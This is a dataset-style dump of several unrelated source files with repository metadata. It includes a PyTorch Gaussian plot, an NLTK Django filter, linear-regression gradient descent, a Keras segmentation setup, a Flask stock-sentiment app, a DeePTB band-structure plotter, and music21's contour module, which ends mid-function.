else:
    device = torch.device('cpu')
print(device)

# Dense 2-D grid over [-4, 4) x [-4, 4) with step 0.01.
X, Y = np.mgrid[-4.0:4:0.01, -4.0:4:0.01]
x = torch.Tensor(X).to(device)
y = torch.Tensor(Y).to(device)

# Sine-modulated 2-D Gaussian.
z = torch.sin(3*x + y) * torch.exp(-(x**2+y**2)/2.0)

# Tensor.numpy() only works on CPU tensors: move the result back first so
# the script also runs when a CUDA/MPS device was selected.
plt.imshow(z.cpu().numpy())
plt.tight_layout()
plt.show()
| rwardd/comp3710 | prac1/gaussian.py | gaussian.py | py | 509 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.__version__",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.backends.mps.is_available",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.backends",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name"... |
21374477352 | from django import template
register = template.Library()
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
@register.filter
def first_letter_word(value):
    """Template filter: build an uppercase acronym from *value*.

    Tokenises the text, drops English stopwords, strips punctuation, and
    joins the first letter of each remaining word, uppercased.
    """
    stop_words = set(stopwords.words('english'))
    tokens = word_tokenize(value)
    filtered = [w for w in tokens if not w.lower() in stop_words]
    # Strip punctuation characters from every token.
    removetable = str.maketrans('', '', '!@#$%^&*()_+-=[]{};:\"\',./<>?\|')
    words = [w.translate(removetable) for w in filtered]
    # The original kept a `chindex` counter that was never incremented, so
    # its "append the whole word" branch was dead code: every word only
    # ever contributed its uppercased first letter.  Behaviour preserved.
    return "".join(w[0].upper() for w in words if w != '')
{
"api_name": "django.template.Library",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "django.template",
"line_number": 2,
"usage_type": "name"
},
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "nlt... |
22017042868 | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 15 11:48:04 2020
@author: Paradeisios
"""
from utils.computeCost import computeCost
import numpy as np
def gradientDescent(X,y,theta,alpha, iterations):
    """Run batch gradient descent for linear regression.

    Parameters: X design matrix (m samples), y targets, theta initial
    parameters, alpha learning rate, iterations number of update steps.

    Returns (theta, J_history): the final parameters and the cost value
    recorded after each update step.
    """
    m = len(y)
    J_history = np.zeros((iterations,1))
    # Redundant initialisation: `derivative` is reassigned every iteration.
    derivative = 0
    for i in range(iterations):
        # Gradient of the squared-error cost: (X.theta - y)^T X
        derivative = (X.dot(theta) - y).dot(X)
        theta = theta - alpha*(1/m)*derivative
        J_history[i]= computeCost(theta,X,y)
    return(theta,J_history)
| paradeisios/Coursera_Machine_Learning | week2/python/utils/gradientDescent.py | gradientDescent.py | py | 514 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "utils.computeCost.computeCost",
"line_number": 20,
"usage_type": "call"
}
] |
42356364206 | import os
import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping
from utils.callbacks import ModelCheckpoint, TimeHistory
from engine.metrics import (jaccard_index, jaccard_index_softmax, IoU_instances,
instance_segmentation_loss, weighted_bce_dice_loss)
def prepare_optimizer(cfg, model):
"""Select the optimizer, loss and metrics for the given model.
Parameters
----------
cfg : YACS CN object
Configuration.
model : Keras model
Model to be compiled with the selected options.
"""
assert cfg.TRAIN.OPTIMIZER in ['SGD', 'ADAM']
assert cfg.LOSS.TYPE in ['CE', 'W_CE_DICE']
# Select the optimizer
if cfg.TRAIN.OPTIMIZER == "SGD":
opt = tf.keras.optimizers.SGD(lr=cfg.TRAIN.LR, momentum=0.99, decay=0.0, nesterov=False)
elif cfg.TRAIN.OPTIMIZER == "ADAM":
opt = tf.keras.optimizers.Adam(lr=cfg.TRAIN.LR, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
# Compile the model
if cfg.PROBLEM.TYPE == "CLASSIFICATION":
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=["accuracy"])
elif cfg.LOSS.TYPE == "CE" and cfg.PROBLEM.TYPE == "SEMANTIC_SEG":
if cfg.MODEL.N_CLASSES > 1:
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=[jaccard_index_softmax])
else:
model.compile(optimizer=opt, loss='binary_crossentropy', metrics=[jaccard_index])
elif cfg.LOSS.TYPE == "CE" and cfg.PROBLEM.TYPE == "INSTANCE_SEG":
if cfg.MODEL.N_CLASSES > 1:
raise ValueError("Not implemented pipeline option: N_CLASSES > 1 and INSTANCE_SEG")
else:
if cfg.DATA.CHANNELS in ["BC", "BCM"]:
model.compile(optimizer=opt, loss='binary_crossentropy', metrics=[jaccard_index])
else:
if cfg.DATA.CHANNELS == "Dv2":
model.compile(optimizer=opt, loss=instance_segmentation_loss(cfg.DATA.CHANNEL_WEIGHTS, cfg.DATA.CHANNELS),
metrics=["mse"])
else:
bin_channels = 2 if cfg.DATA.CHANNELS in ["BCD", "BCDv2"] else 1
model.compile(optimizer=opt, loss=instance_segmentation_loss(cfg.DATA.CHANNEL_WEIGHTS, cfg.DATA.CHANNELS),
metrics=[IoU_instances(binary_channels=bin_channels)])
elif cfg.LOSS.TYPE == "W_CE_DICE" and cfg.PROBLEM.TYPE == "SEMANTIC_SEG":
model.compile(optimizer=opt, loss=weighted_bce_dice_loss(w_dice=0.66, w_bce=0.33), metrics=[jaccard_index])
elif cfg.LOSS.TYPE == "W_CE_DICE" and cfg.PROBLEM.TYPE == "INSTANCE_SEG":
raise ValueError("Not implemented pipeline option: LOSS.TYPE == W_CE_DICE and INSTANCE_SEG")
def build_callbacks(cfg):
"""Create training and validation generators.
Parameters
----------
cfg : YACS CN object
Configuration.
Returns
-------
callbacks : List of callbacks
All callbacks to be applied to a model.
"""
callbacks = []
# To measure the time
time_callback = TimeHistory()
callbacks.append(time_callback)
# Stop early and restore the best model weights when finished the training
earlystopper = EarlyStopping(patience=cfg.TRAIN.PATIENCE, verbose=1, restore_best_weights=True)
callbacks.append(earlystopper)
# Save the best model into a h5 file in case one need again the weights learned
os.makedirs(cfg.PATHS.CHECKPOINT, exist_ok=True)
checkpointer = ModelCheckpoint(cfg.PATHS.CHECKPOINT_FILE, verbose=1, save_best_only=True)
callbacks.append(checkpointer)
return callbacks
| lijunRNA/EM_Image_Segmentation | engine/__init__.py | __init__.py | py | 3,725 | python | en | code | null | github-code | 36 | [
{
"api_name": "tensorflow.keras.optimizers.SGD",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.optimizers.Adam",
"line_number": 29,
"usage_type": "call"
},
{... |
192760992 | from flask import Flask, render_template, url_for, request, redirect
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
import requests
import paralleldots
import stripe
app = Flask(__name__)
pub_key = ''
secret_key = ''
stripe.api_key = secret_key
class Analyze:
report_key = ''
sentiment_key = ''
def __init__(self, company):
self.company = company
self.url = 'https://datafied.api.edgar-online.com/v2/corefinancials/ann?primarysymbols=' + \
self.company + '&appkey=' + self.report_key
def get_fin_report(self):
URL = self.url
PARAMS = {}
r = requests.get(url=URL, params=PARAMS)
self.data = r.json()
return None
def sentiment_analysis(self):
paralleldots.set_api_key(self.sentiment_key)
self.response = paralleldots.sentiment(self.data, 'en')
return None
def predict(self):
self.get_fin_report()
self.sentiment_analysis()
goodornot = self.response['sentiment']
result = max(goodornot, key=goodornot.get)
return result
# Route for handling the login page logic
@app.route('/', methods=['GET', 'POST'])
def index():
error = None
if request.method == 'POST':
return redirect(url_for('reallyobscurefilename'))
return render_template('index.html', error=error, pub_key = pub_key)
@app.route('/reallyobscurefilename', methods=['POST', 'GET'])
def reallyobscurefilename():
result = ''
if request.method == 'POST':
company = request.form['company']
new_analysis = Analyze(company=company)
ans = new_analysis.predict()
if ans in ['positive', 'neutral', 'negative']:
result = 'Our expert professional guidance is that this is a ' + \
ans + ' investment.'
return render_template('reallyobscurefilename.html', result = result)
if __name__ == "__main__":
app.run(debug=True) | mikeyj777/siraj_midterm_take3 | app.py | app.py | py | 1,955 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "stripe.api_key",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "requests.get",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "paralleldots.set_api_key"... |
21365635224 | import numpy as np
from dptb.utils.tools import j_must_have
from dptb.utils.make_kpoints import ase_kpath, abacus_kpath, vasp_kpath
from ase.io import read
import ase
import matplotlib.pyplot as plt
import matplotlib
import logging
log = logging.getLogger(__name__)
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
class bandcalc(object):
def __init__ (self, apiHrk, run_opt, jdata):
self.apiH = apiHrk
if isinstance(run_opt['structure'],str):
self.structase = read(run_opt['structure'])
elif isinstance(run_opt['structure'],ase.Atoms):
self.structase = run_opt['structure']
else:
raise ValueError('structure must be ase.Atoms or str')
self.band_plot_options = jdata
self.results_path = run_opt.get('results_path')
self.apiH.update_struct(self.structase)
self.ref_band = self.band_plot_options.get("ref_band", None)
self.use_gui = self.band_plot_options.get("use_gui", False)
def get_bands(self):
kline_type = self.band_plot_options['kline_type']
if kline_type == 'ase':
kpath = self.band_plot_options['kpath']
nkpoints = self.band_plot_options['nkpoints']
self.klist, self.xlist, self.high_sym_kpoints, self.labels = ase_kpath(structase=self.structase,
pathstr=kpath, total_nkpoints=nkpoints)
elif kline_type == 'abacus':
kpath = self.band_plot_options['kpath']
self.labels = self.band_plot_options['klabels']
self.klist, self.xlist, self.high_sym_kpoints = abacus_kpath(structase=self.structase, kpath=kpath)
elif kline_type == 'vasp':
kpath = self.band_plot_options['kpath']
high_sym_kpoints_dict = self.band_plot_options['high_sym_kpoints']
number_in_line = self.band_plot_options['number_in_line']
self.klist, self.xlist, self.high_sym_kpoints, self.labels = vasp_kpath(structase=self.structase,
pathstr=kpath, high_sym_kpoints_dict=high_sym_kpoints_dict, number_in_line=number_in_line)
else:
log.error('Error, now, kline_type only support ase_kpath, abacus, or vasp.')
raise ValueError
all_bonds, hamil_blocks, overlap_blocks = self.apiH.get_HR()
self.eigenvalues, self.estimated_E_fermi = self.apiH.get_eigenvalues(self.klist)
if self.band_plot_options.get('E_fermi',None) != None:
self.E_fermi = self.band_plot_options['E_fermi']
log.info(f'set E_fermi from jdata: {self.E_fermi}, While the estimated value in line-mode is {self.estimated_E_fermi}')
else:
self.E_fermi = 0.0
log.info(f'set E_fermi = 0.0, While the estimated value in line-mode is {self.estimated_E_fermi}')
eigenstatus = {'klist': self.klist,
'xlist': self.xlist,
'high_sym_kpoints': self.high_sym_kpoints,
'labels': self.labels,
'eigenvalues': self.eigenvalues,
'E_fermi': self.E_fermi }
np.save(f'{self.results_path}/bandstructure',eigenstatus)
return eigenstatus
def get_HR(self):
all_bonds, hamil_blocks, overlap_blocks = self.apiH.get_HR()
return all_bonds, hamil_blocks, overlap_blocks
def band_plot(self):
matplotlib.rcParams['font.size'] = 7
matplotlib.rcParams['pdf.fonttype'] = 42
# plt.rcParams['font.sans-serif'] = ['Times New Roman']
emin = self.band_plot_options.get('emin')
emax = self.band_plot_options.get('emax')
fig = plt.figure(figsize=(4.5,4),dpi=100)
ax = fig.add_subplot(111)
band_color = '#5d5d5d'
# plot the line
if self.ref_band:
ref_eigenvalues = np.load(self.ref_band)
if len(ref_eigenvalues.shape) == 3:
ref_eigenvalues = ref_eigenvalues.reshape(ref_eigenvalues.shape[1:])
elif len(ref_eigenvalues.shape) != 2:
log.error("Reference Eigenvalues' shape mismatch.")
raise ValueError
if ref_eigenvalues.shape[0] != self.eigenvalues.shape[0]:
log.error("Reference Eigenvalues' should have sampled from the sample kpath as model's prediction.")
raise ValueError
ref_eigenvalues = ref_eigenvalues - (np.min(ref_eigenvalues) - np.min(self.eigenvalues))
nkplot = (len(np.unique(self.high_sym_kpoints))-1) * 7
nintp = len(self.xlist) // nkplot
if nintp == 0:
nintp = 1
band_ref = ax.plot(self.xlist[::nintp], ref_eigenvalues[::nintp] - self.E_fermi, 'o', ms=4, color=band_color, alpha=0.8, label="Ref")
band_pre = ax.plot(self.xlist, self.eigenvalues - self.E_fermi, color="tab:red", lw=1.5, alpha=0.8, label="DeePTB")
else:
ax.plot(self.xlist, self.eigenvalues - self.E_fermi, color="tab:red",lw=1.5, alpha=0.8)
# add verticle line
for ii in self.high_sym_kpoints[1:-1]:
ax.axvline(ii, color='gray', lw=1,ls='--')
# add shadow
# for i in range(self.eigenvalues.shape[1]):
# ax.fill_between(self.xlist, self.eigenvalues[:,i] - self.E_fermi, -2, alpha=0.05, color=band_color)
# add ticks
if not (emin is None or emax is None):
ax.set_ylim(emin,emax)
ax.set_xlim(self.xlist.min()-0.03,self.xlist.max()+0.03)
ax.set_ylabel('E - EF (eV)',fontsize=12)
ax.yaxis.set_minor_locator(MultipleLocator(1.0))
ax.tick_params(which='both', direction='in', labelsize=12, width=1.5)
ax.tick_params(which='major', length=6)
ax.tick_params(which='minor', length=4, color='gray')
# ax.set_yticks(None, fontsize=12)
ax.set_xticks(self.high_sym_kpoints, self.labels, fontsize=12)
ax.grid(color='gray', alpha=0.2, linestyle='-', linewidth=1)
ax.set_axisbelow(True)
fig.patch.set_facecolor('#f2f2f2')
fig.patch.set_alpha(1)
for spine in ax.spines.values():
spine.set_edgecolor('#5d5d5d')
spine.set_linewidth(1.5)
if self.ref_band:
plt.legend(handles=[band_pre[0], band_ref[0]], loc="best")
plt.tight_layout()
# remove the box around the plot
ax.set_frame_on(False)
plt.savefig(f'{self.results_path}/band.png',dpi=300)
if self.use_gui:
plt.show()
| deepmodeling/DeePTB | dptb/postprocess/bandstructure/band.py | band.py | py | 6,701 | python | en | code | 21 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "ase.io.read",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "ase.Atoms",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "dptb.utils.make_kpoints.a... |
6128705889 | import random
import unittest
from music21 import base # for _missingImport testing.
from music21 import repeat
from music21 import exceptions21
from music21 import corpus
from music21 import environment
_MOD = 'contour.py'
environLocal = environment.Environment(_MOD)
#---------------------------------------------------
class ContourException(exceptions21.Music21Exception):
    '''Raised when contour analysis cannot proceed, e.g. when the optional
    matplotlib/numpy dependencies are missing or no metric is known for a
    requested contour type.'''
    pass
class OverwriteException(exceptions21.Music21Exception):
    '''Raised when a cached contour or a registered metric would be silently
    replaced without the caller passing overwrite=True.'''
    pass
def _getExtendedModules():
    '''
    this is done inside a def, so that the slow import of matplotlib is not done
    in ``from music21 import *`` unless it's actually needed.
    Returns a tuple: (plt, numpy)
    '''
    # base._missingImport lists optional dependencies that failed to import;
    # fail fast with a domain exception rather than an ImportError later on.
    if 'matplotlib' in base._missingImport:
        raise ContourException(
            'could not find matplotlib, contour mapping is not allowed (numpy is also required)')
    if 'numpy' in base._missingImport:
        raise ContourException('could not find numpy, contour mapping is not allowed')
    import matplotlib.pyplot as plt
    import numpy
    return (plt, numpy)
class ContourFinder:
    '''
    ContourFinder is a class for finding 2-dimensional contours
    of a piece based on different metrics.
    Predefined metrics are 'dissonance', 'tonality', and 'spacing'.
    To get a contour, use ContourFinder(myStream).getContour('dissonance'), for example.
    If you wish to create your own metric for giving a numerical score to a stream, you can call
    ContourFinder(myStream).getContour('myMetricName', metric=myMetric)
    ContourFinder looks at a moving window of m measures, and moves that window by
    n measures each time.
    M and n are specified by 'window' and 'slide', which are both 1 by default.
    >>> s = corpus.parse('bwv29.8')
    >>> ContourFinder(s).plot('tonality')
    TODO: image here...
    '''
    def __init__(self, s=None):
        self.s = s # a stream.Score object
        self.sChords = None #lazy evaluation...
        self.key = None
        self._contours = { } #A dictionary mapping a contour type to a normalized contour dictionary
        #self.metrics contains a dictionary mapping the name of a metric to a tuple (x,y)
        # where x=metric function and y=needsChordify
        self._metrics = {"dissonance": (self.dissonanceMetric, True),
                         "spacing": (self.spacingMetric, True),
                         "tonality": (self.tonalDistanceMetric, False) }
        # duck-typing flag checked by AggregateContour.addPieceToContour
        self.isContourFinder = True

    def setKey(self, key):
        '''
        Sets the key of ContourFinder's internal stream. If not set manually, self.key will
        be determined by self.s.analyze('key').
        '''
        self.key = key

    def getContourValuesForMetric(self, metric, window=1, slide=1, needChordified=False):
        '''
        Returns a dictionary mapping measure numbers to that measure's score under
        the provided metric.
        Ignores pickup measures entirely.
        Window is a positive integer indicating how many measure the metric should
        look at at once, and slide is
        a positive integer indicating by how many measures the window should slide
        over each time the metric is measured.
        e.g. if window=4 and slide=2, metric = f, the result will be of the form:
        { measures 1-4: f(measures 1-4),
        measures 3-6: f(measures 3-6),
        measures 5-8: f( measures5-8), ...}
        >>> metric = lambda s: len(s.measureOffsetMap())
        >>> c = corpus.parse('bwv10.7')
        >>> res = ContourFinder(c).getContourValuesForMetric(metric, 3, 2, False)
        >>> resList = sorted(list(res.keys()))
        >>> resList
        [1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21]
        >>> [res[x] for x in resList]
        [3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2]
        OMIT_FROM_DOCS
        >>> #set([1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21]).issubset(set(res.keys()))
        '''
        res = {}
        if needChordified:
            # chordify once and cache it: it is expensive and is shared by
            # all chord-based metrics
            if self.sChords is None:
                self.sChords = self.s.chordify()
            s = self.sChords
        else:
            s = self.s
        mOffsets = s.measureOffsetMap()
        hasPickup = repeat.RepeatFinder(s).hasPickup()
        numMeasures = len(mOffsets) - hasPickup # hasPickup is boolean: True subtracts 1
        for i in range(1, numMeasures + 1, slide): #or numMeasures-window + 1
            fragment = s.measures(i, i + window - 1)
            #TODO: maybe check that i+window-1 is less than numMeasures + window / 2
            resValue = metric(fragment)
            res[i] = resValue
        return res

    #TODO: tests that use simple 4-bar pieces that we have to create...
    #ALSO: Need pictures or something! Need a clear demonstration!
    def getContour(self, cType, window=None, slide=None, overwrite=False,
                   metric=None, needsChordify=False, normalized=False):
        '''
        Stores and then returns a normalized contour of the type cType.
        cType can be either 'spacing', 'tonality', or 'dissonance'.
        If using a metric that is not predefined, cType is any string that
        signifies what your metric measures.
        In this case, you must pass getContour a metric function which takes
        in a music21 stream and outputs a score.
        If passing a metric that requires the music21 stream be just chords,
        specify needsChordify=True.
        Window is how many measures are considered at a time and slide is the
        number of measures the window moves
        over each time. By default, measure and slide are both 1.
        Each time you call getContour for a cType, the result is cached.
        If you wish to get the contour
        for the same cType more than once, with different parameters
        (with a different window and slide, for example)
        then specify overwrite=True
        To get a contour where measures map to the metric values,
        use normalized=False (the default), but to get a contour
        which evenly divides time between 1.0 and 100.0, use normalized=True
        >>> cf = ContourFinder( corpus.parse('bwv10.7'))
        >>> mycontour = cf.getContour('dissonance')
        >>> [mycontour[x] for x in sorted(mycontour.keys())]
        [0.0, 0.25, 0.5, 0.5, 0.0, 0.0, 0.25, 0.75, 0.0, 0.0, 0.5, 0.75, 0.75,
        0.0, 0.5, 0.5, 0.5, 0.5, 0.75, 0.75, 0.75, 0.0]
        >>> mycontour = cf.getContour('always one', 2, 2, metric= lambda x: 1.0)
        >>> [mycontour[x] for x in sorted(mycontour.keys())]
        [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
        >>> mycontour = cf.getContour('spacing', metric = lambda x: 2, overwrite=False)
        Traceback (most recent call last):
        OverwriteException: Attempted to overwrite 'spacing' metric but did
        not specify overwrite=True
        >>> mycontour = cf.getContour('spacing', slide=3, metric = lambda x: 2.0, overwrite=True)
        >>> [mycontour[x] for x in sorted(mycontour.keys())]
        [2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0]
        >>> mycontour = cf.getContour('spacing')
        >>> [mycontour[x] for x in sorted(mycontour.keys())]
        [2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0]
        '''
        if overwrite is False:
            if cType in self._contours:
                # a cached contour already exists; passing new window/slide
                # values would silently replace it, so demand overwrite=True
                if window is not None or slide is not None:
                    raise OverwriteException(
                        "Attempted to overwrite cached contour of type {0}".format(cType) +
                        " but did not specify overwrite=True")
                else:
                    return self._contours[cType]
            elif cType in self._metrics:
                # a metric is registered for this cType but no contour cached yet
                if metric is not None:
                    raise OverwriteException("Attempted to overwrite '{0}' ".format(cType) +
                                             "metric but did not specify overwrite=True")
                else:
                    metric, needsChordify = self._metrics[cType]
            else:
                # first time this cType is seen: register the user-supplied metric
                self._metrics[cType] = (metric, needsChordify)
        else:
            if metric is None:
                if cType in self._metrics:
                    metric, needsChordify = self._metrics[cType]
                else:
                    raise ContourException("Must provide your own metric for type: %s" % cType)
        # window/slide default to 1 only after the overwrite checks above,
        # so that "explicitly passed" can be distinguished from "defaulted"
        if slide is None:
            slide = 1
        if window is None:
            window = 1
        contour = self.getContourValuesForMetric(metric, window, slide, needsChordify)
        if normalized:
            contour = self._normalizeContour(contour, 100.0)
        self._contours[cType] = contour
        return contour

    def _normalizeContour(self, contourDict, maxKey):
        '''
        Normalize a contour dictionary so that the values of the keys range from 0.0 to length.
        >>> mycontour = { 0.0: 1.0, 3.0: 0.5, 6.0: 0.8, 9.0: 0.3, 12.0: 0.15,
        ... 15.0: 0.13, 18.0: 0.4, 21.0: 0.6 }
        >>> res = ContourFinder()._normalizeContour(mycontour, 100)
        >>> resKeys = list(res.keys())
        >>> resKeys.sort()
        >>> contourKeys = list(mycontour.keys())
        >>> contourKeys.sort()
        >>> len(contourKeys) == len(resKeys)
        True
        >>> x = True
        >>> for i in range(len(contourKeys)):
        ...     if mycontour[contourKeys[i]] != res[resKeys[i]]:
        ...         x = False
        >>> x
        True
        >>> 100.0 in res
        True
        >>> 0.0 in res
        True
        '''
        myKeys = list(contourDict.keys())
        myKeys.sort()
        numKeys = len(myKeys)
        # spread the keys evenly from 0.0 to maxKey, preserving value order
        # NOTE(review): assumes at least two keys; a single-entry contour
        # would divide by zero here -- confirm callers guarantee this
        spacing = (maxKey)/(numKeys-1.0)
        res = {}
        i = 0.0
        for j in myKeys:
            res[round(i, 3)] = round(float(contourDict[j]), 5)
            i += spacing
        return res

    #TODO: give same args as getContour, maybe? Also, test this.
    def plot(self, cType, contourIn=None, regression=True, order=4,
             title='Contour Plot', fileName=None):
        '''Plot the contour of type cType (computing it if necessary), with an
        optional polynomial regression curve of the given order; saves to
        fileName + '.png' when fileName is given, otherwise shows the plot.'''
        (plt, numpy) = _getExtendedModules()
        if contourIn is None:
            if cType not in self._contours:
                contourIn = self.getContour(cType)
            else:
                contourIn = self._contours[cType]
        x = list(contourIn.keys())
        x.sort()
        y = [contourIn[i] for i in x]
        plt.plot(x, y, '.', label='contour', markersize=5)
        if regression:
            # least-squares polynomial fit evaluated on an evenly spaced grid
            p = numpy.poly1d(numpy.polyfit(x, y, order))
            t = numpy.linspace(0, x[-1], x[-1] + 1)
            plt.plot(t, p(t), 'o-', label='estimate', markersize=1) #probably change label
        plt.xlabel('Time (arbitrary units)')
        plt.ylabel('Value for %s metric' % cType)
        plt.title(title) #say for which piece
        #plt.savefig(filename + '.png')
        if fileName is not None:
            plt.savefig(fileName + '.png')
        else:
            plt.show()
        plt.clf()

    def randomize(self, contourDict):
        '''
        Returns a version of contourDict where the keys-to-values mapping is scrambled.
        >>> myDict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8, 9:9, 10:10, 11:11, 12:12, 13:13,
        ... 14:14, 15:15, 16:16, 17:17, 18:18, 19:19, 20:20}
        >>> res = ContourFinder().randomize(myDict)
        >>> res == myDict
        False
        >>> sorted(list(res.keys())) == sorted(list(myDict.keys()))
        True
        >>> sorted(list(res.values())) == sorted(list(myDict.values()))
        True
        '''
        res = {}
        myKeys = list(contourDict.keys())
        myValues = list(contourDict.values())
        # shuffle the keys only: same key set, same value multiset, new pairing
        random.shuffle(myKeys)
        for i in range(len(myKeys)):
            res[myKeys[i]] = myValues[i]
        return res

    #--- code for the metrics
    def _calcGenericMetric(self, inpStream, chordMetric):
        '''
        Helper function which, given a metric value for a chord, calculates a metric
        for a series of measures by taking the sum of each chord's metric value weighted by
        its duration.
        '''
        score = 0
        n=0
        for measure in inpStream:
            if 'Measure' in measure.classes:
                for chord in measure:
                    if 'Chord' in chord.classes:
                        dur = chord.duration.quarterLength
                        score += chordMetric(chord)*dur
                        n += dur
        # duration-weighted average; None when the fragment contained no chords
        if n != 0:
            return score / n
        else:
            return None

    def dissonanceMetric(self, inpStream):
        '''
        inpStream is a stream containing some number of measures which each contain chords.
        Output is a number between 0 and 1 which is proportional to the number of dissonant chords.
        To work correctly, input must contain measures and no parts.
        >>> c = corpus.parse('bwv102.7').chordify()
        >>> ContourFinder().dissonanceMetric( c.measures(1, 1) )
        0.25
        >>> ContourFinder().dissonanceMetric( c.measures(8, 8) )
        0.5
        >>> ContourFinder().dissonanceMetric( c.measures(1, 10)) < 1.0
        True
        '''
        # isConsonant() returns a bool, so 1-x.isConsonant() is 0 for
        # consonant chords and 1 for dissonant ones
        return self._calcGenericMetric(inpStream, lambda x: 1-x.isConsonant() )

    def spacingMetric(self, inpStream):
        '''
        Defines a metric which takes a music21 stream containing measures and no parts.
        This metric measures how spaced out notes in a piece are.
        '''
        #TODO: FIGURE OUT IF THIS IS REASONABLE! MIGHT WANT TO JUST DO: sqrt( sum(dist^2) )
        def spacingForChord(chord):
            # score one chord by the gaps between adjacent pitches (in ps, i.e.
            # midi-like pitch space); the lowest gap is damped (**0.7) while
            # upper gaps are emphasized (**1.5)
            pitches = [ x.ps for x in chord.pitches ]
            pitches.sort()
            res = 0
            if len(pitches) <= 1:
                return 0
            elif len(pitches) == 2:
                return (pitches[1] - pitches[0])
            else:
                res += (pitches[1] - pitches[0]) ** (0.7)
                for i in range(1, len(pitches)-1):
                    res += (pitches[i + 1]-pitches[i]) ** (1.5)
                return res
        return self._calcGenericMetric(inpStream, spacingForChord)

    def tonalDistanceMetric(self, inpStream):
        '''
        Returns a number between 0.0 and 1.0 that is a measure of how far away the key of
        inpStream is from the key of ContourFinder's internal stream.
        '''
        if self.key is None:
            self.key = self.s.analyze('key')
        guessedKey = inpStream.analyze('key')
        certainty = -2 #should be replaced by a value between -1 and 1
        if guessedKey == self.key:
            certainty = guessedKey.correlationCoefficient
        else:
            for pkey in guessedKey.alternateInterpretations:
                if pkey == self.key:
                    certainty = pkey.correlationCoefficient
                    break
        # map certainty in [-1, 1] to a distance in [0, 1]
        # NOTE(review): if the piece's key is not among the guessed
        # interpretations, certainty stays -2 and this returns 1.5, outside
        # the documented range -- confirm whether that is intended
        return (1 - certainty) / 2.0
class AggregateContour:
    '''
    An AggregateContour object is an object that stores and consolidates
    contour information for a large group
    of pieces.
    To add a piece to the aggregate contour, use
    AggregateContour.addPieceToContour(piece, cType), where cType is
    the type of contour (the default possibilities are
    'tonality', 'spacing', and 'dissonance'), and piece is either
    a parsed music21 stream or a ContourFinder object.
    To get the combined contour as list of ordered pairs, use
    AggregateContour.getCombinedContour(), and to
    get the combined contour as a polynomial approximation, use
    AggregateContour.getCombinedContourPoly().
    You can plot contours with AggregateContour.plot(cType).
    To compare a normalized contour to the aggregate, use
    AggregateContour.dissimilarityScore(cType, contour).
    '''
    def __init__(self, aggContours=None):
        if aggContours is None:
            self.aggContours = {}
            # = {'spacing': [ {1:2, 2:3}, {...}, ...], 'tonality': [...], ... }
        else:
            self.aggContours = aggContours
        self._aggContoursAsList = {} # cache: cType -> [(time, score), ...]
        self._aggContoursPoly = {} # cache: cType -> polynomial fit

    def addPieceToContour(self, piece, cType, metric=None, window=1,
                          slide=1, order=8, needsChordify=False):
        '''
        Adds a piece to the aggregate contour.
        piece is either a music21 stream, or a ContourFinder object (which
        should have a stream wrapped inside of it).
        cType is the contour type.
        If using a metric that is not predefined, cType is any string
        that signifies what your metric measures.
        In this case, you must pass getContour a metric function
        which takes in a music21 stream and outputs a score.
        If passing a metric that requires the music21 stream be
        just chords, specify needsChordify=True.
        Window is how many measures are considered at a time and
        slide is the number of measures the window moves
        over each time. By default, measure and slide are both 1.
        '''
        # duck-type check: accept either a ContourFinder or a raw stream
        if hasattr(piece, 'isContourFinder') and piece.isContourFinder:
            pass
        else:
            piece = ContourFinder(piece)
        # normalized=True so every piece's contour spans the same 0-100 axis
        contour = piece.getContour(cType, window=window, slide=slide,
                                   overwrite=False, metric=metric,
                                   needsChordify=needsChordify, normalized=True)
        if cType not in self.aggContours:
            self.aggContours[cType] = []
        self.aggContours[cType].append(contour)
        return

    def getCombinedContour(self, cType): #, metric=None, window=1, slide=1, order=8):
        '''
        Returns the combined contour of the type specified by cType. Instead of a dictionary,
        this contour is just a list of ordered pairs (tuples) with the
        first value being time and the
        second value being the score.
        '''
        if cType in self._aggContoursAsList:
            return self._aggContoursAsList[cType]
        elif cType in self.aggContours:
            contour = self.aggContours[cType]
            res = []
            # flatten every per-piece contour dict into one (time, score) list
            for contDict in contour:
                res.extend( [ (x, contDict[x]) for x in contDict] )
            self._aggContoursAsList[cType] = res
            return res
        else:
            return None

    def getCombinedContourPoly(self, cType, order=8):
        '''
        Returns the polynomial fit for the aggregate contour of type cType.
        Order is the order of the resulting polynomial. e.g. For a linear regression, order=1.
        '''
        (unused_plt, numpy) = _getExtendedModules()
        if cType in self._aggContoursPoly:
            return self._aggContoursPoly[cType]
        elif cType in self._aggContoursAsList:
            contList = self._aggContoursAsList[cType]
        elif cType in self.aggContours:
            contList = self.getCombinedContour(cType)
        else:
            return None
